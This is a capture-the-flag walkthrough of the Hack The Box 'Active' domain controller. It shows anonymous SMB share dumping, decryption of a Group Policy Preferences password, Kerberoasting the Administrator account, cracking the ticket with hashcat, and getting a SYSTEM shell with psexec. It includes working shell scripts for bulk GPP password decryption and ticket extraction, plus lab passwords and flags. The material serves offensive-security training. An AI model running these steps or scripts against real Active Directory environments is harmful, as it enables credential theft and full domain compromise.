Walkthrough

Recon

nmap

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2021-07-02 09:48:09Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
49152/tcp open  msrpc         syn-ack Microsoft Windows RPC
49153/tcp open  msrpc         syn-ack Microsoft Windows RPC
49154/tcp open  msrpc         syn-ack Microsoft Windows RPC
49155/tcp open  msrpc         syn-ack Microsoft Windows RPC
49157/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         syn-ack Microsoft Windows RPC
The open ports already tell us what this host is: DNS (53), Kerberos (88), LDAP (389/636) plus the global catalog (3268/3269), kpasswd (464) and SMB (445) on one machine means a Domain Controller. nmap also gives us the domain name (active.htb) and the OS (Windows Server 2008 R2 SP1, build 6.1.7601).

Enumerating Open Shares

Ξ ~/tmp  smbclient -L \\\\10.10.10.100 -U '' -N                      

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    Replication     Disk      
    SYSVOL          Disk      Logon server share 
    Users           Disk      

The Replication share is readable over a null session (no username, no password), so let's dump its contents:

Ξ Active/dump  smbclient \\\\10.10.10.100\\Replication -U '' -N 
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> prompt off
smb: \> mget *

GPP Stored Credentials

The share is a copy of SYSVOL, i.e. the Group Policy objects of the domain, and those can carry Group Policy Preferences (GPP) XML files. Let's search them for stored credentials.

Credentials stored in GPP are an old weakness (MS14-025, fixed in 2014). The "fix" only removed the ability to create new GPP passwords: Microsoft had published the AES key used to encrypt them, and any XML file that was written before the patch stays in SYSVOL, readable by every domain user (here even anonymously). For further reading see https://adsecurity.org/?p=2288

The encrypted password is stored in the cpassword attribute of the XML, so we can grep the dump for it:

Ξ Active/dump  grep -iR "cpassword"                                        
active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml:<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>

Found a GPP-encrypted password for the user SVC_TGS in the Default Domain Policy's Groups.xml: edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

Kali Linux ships gpp-decrypt, which decrypts the value with the published key:

Ξ OldBoxes/shocker  gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

svc_tgs user password is GPPstillStandingStrong2k18
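To make the two steps above (grep for cpassword, decrypt with gpp-decrypt) repeatable over a whole dump, here is an added helper that is not part of the original writeup. It re-implements what gpp-decrypt does with openssl: cpassword is AES-256-CBC with a zero IV and PKCS#7 padding, the plaintext is UTF-16LE, and the key is the one Microsoft published on MSDN (which is exactly why these passwords are recoverable). The Groups.xml used in the test is a constructed sample, not the file from the box.

```shell
#!/bin/sh
# Added example, not part of the original writeup: re-implement what
# gpp-decrypt does and run it over a whole SYSVOL/Replication dump.
# The key below is the AES-256 key Microsoft published on MSDN for GPP,
# not a secret of this box.
GPP_AES_KEY='4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'
ZERO_IV='00000000000000000000000000000000'

# gpp_decrypt <cpassword>  -> prints the cleartext password
gpp_decrypt() {
    cpw=$1
    # GPP strips the base64 '=' padding; restore it or base64 -d refuses the input
    case $(( ${#cpw} % 4 )) in
        2) cpw="${cpw}==" ;;
        3) cpw="${cpw}=" ;;
    esac
    # AES-256-CBC, zero IV, PKCS#7 padding removed by openssl.
    # tr drops the 0x00 high bytes of the UTF-16LE plaintext, which is enough
    # for ASCII passwords; use 'iconv -f UTF-16LE' instead for non-ASCII values.
    printf '%s' "$cpw" | base64 -d \
        | openssl enc -d -aes-256-cbc -K "$GPP_AES_KEY" -iv "$ZERO_IV" \
        | tr -d '\000'
}

# gpp_scan <dir>  -> "file: userName => password" for every non-empty cpassword
# in the dump. Groups.xml is the common case, but Services.xml,
# ScheduledTasks.xml, DataSources.xml, Drives.xml and Printers.xml can carry one too.
gpp_scan() {
    find "$1" -type f -name '*.xml' -exec grep -l 'cpassword=' {} + 2>/dev/null |
    while read -r f; do
        # one <Properties .../> element per match; pull the two attributes out
        grep -o '<Properties[^>]*cpassword="[^"]*"[^>]*>' "$f" |
        while read -r props; do
            cpw=$(printf '%s' "$props" | sed -n 's/.*cpassword="\([^"]*\)".*/\1/p')
            [ -n "$cpw" ] || continue      # cpassword="" means no password was set
            user=$(printf '%s' "$props" | sed -n 's/.*userName="\([^"]*\)".*/\1/p')
            printf '%s: %s => %s\n' "$f" "${user:-<no userName>}" "$(gpp_decrypt "$cpw")"
        done
    done
}

# Usage on the smbclient dump from above:
#   gpp_scan ./active.htb
```

The scan deliberately skips entries whose cpassword is empty, which is what you get for GPP items that only rename or disable an account; those produce a lot of noise in grep output but hold nothing to decrypt.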

Request SPN Service Account Tickets

With svc_tgs credentials we are a plain domain user, which is all Kerberoasting needs: any authenticated user can request a service ticket (TGS) for every account that has an SPN set, and that ticket is encrypted with the service account's password hash, so it can be cracked offline. GetUserSPNs.py with -request does the lookup and the ticket requests in one go:

Ξ Active/dump  GetUserSPNs.py -dc-ip 10.10.10.100 active.htb/svc_tgs -request 
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2021-01-21 11:07:03.723783             



$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$b43bf8023365ea1108b5424b53c2a450$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

The Administrator account has an SPN registered (active/CIFS:445), which is a misconfiguration: we now hold a ticket encrypted with the Administrator's password hash, and the $23$ in the line tells us it is RC4-HMAC (etype 23), the fastest kind to crack.

Let's crack it with hashcat; mode 13100 is "Kerberos 5 TGS-REP etype 23":

Active/dump  hashcat -a 0 -m 13100 admin-krb.txt /usr/share/wordlists/rockyou.txt --force
hashcat (v6.1.1) starting...

...

$krb5tgs$23$*Administrator$...
....9d7c:Ticketmaster1968

Session..........: hashcat
Status...........: Cracked
....
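GetUserSPNs.py prints the account table first and the ticket lines after it, so for hashcat the $krb5tgs$ lines have to be pulled out into their own file (admin-krb.txt above). The added helper below does that and checks the layout of each line against the etype-23 format before picking the hashcat mode; it is not part of the original writeup, and the GetUserSPNs output and ticket it is tested with are constructed samples with dummy hex, not real tickets.

```shell
#!/bin/sh
# Added example, not part of the original writeup: pull the ticket lines
# out of GetUserSPNs.py's output and sanity-check their layout before
# handing them to hashcat. Layout of an RC4-HMAC (etype 23) ticket line:
#   $krb5tgs$23$*<user>$<REALM>$<spn>*$<16-byte HMAC-MD5 hex>$<edata2 hex>
# hashcat cracks it with -m 13100. AES tickets (etype 17/18) use modes
# 19600/19700 and a different layout, which this helper deliberately rejects
# rather than guessing.

# extract_tickets <GetUserSPNs output file>  -> one $krb5tgs$ line per account
extract_tickets() {
    grep '^\$krb5tgs\$' "$1"
}

# krb5tgs_info <ticket line>  -> "user=... realm=... spn=... mode=13100"
krb5tgs_info() {
    parsed=$(printf '%s\n' "$1" | sed -n \
        's/^\$krb5tgs\$23\$\*\([^$]*\)\$\([^$]*\)\$\([^*]*\)\*\$\([0-9a-fA-F]*\)\$[0-9a-fA-F]*$/\1 \2 \3 \4/p')
    if [ -z "$parsed" ]; then
        echo "not an etype-23 krb5tgs line (AES ticket or malformed input)" >&2
        return 1
    fi
    set -- $parsed
    # RC4-HMAC tickets carry a 16-byte HMAC-MD5 checksum = 32 hex chars
    if [ "${#4}" -ne 32 ]; then
        echo "checksum field is not 16 bytes" >&2
        return 1
    fi
    printf 'user=%s realm=%s spn=%s mode=13100\n' "$1" "$2" "$3"
}

# Usage with the Impacket output saved to a file:
#   extract_tickets spns.txt > admin-krb.txt
#   extract_tickets spns.txt | while read -r l; do krb5tgs_info "$l"; done
```

Checking the etype before running hashcat matters in practice: a DC that hands out AES tickets for the same account (etype 18) produces lines that look similar but need -m 19700 and crack roughly three orders of magnitude slower, so it is worth knowing what you have before committing GPU time.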

We now have the Administrator password, Ticketmaster1968, and can log in to the target with full privileges; psexec.py uploads a service binary over ADMIN$ and starts it as SYSTEM:

HTB/Boxes  psexec.py administrator:'Ticketmaster1968'@10.10.10.100          
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file eWhpxQSR.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service RfrB on 10.10.10.100.....
[*] Starting service RfrB.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>

Now we can grab the user.txt and root.txt flags:

c:\Users>more svc_tgs\desktop\user.txt
86d67d8ba232bb6a254aa4d10159e983

c:\Users>more administrator\desktop\root.txt
b5fc76d1d6b91d77b2fbf2d54d0f708b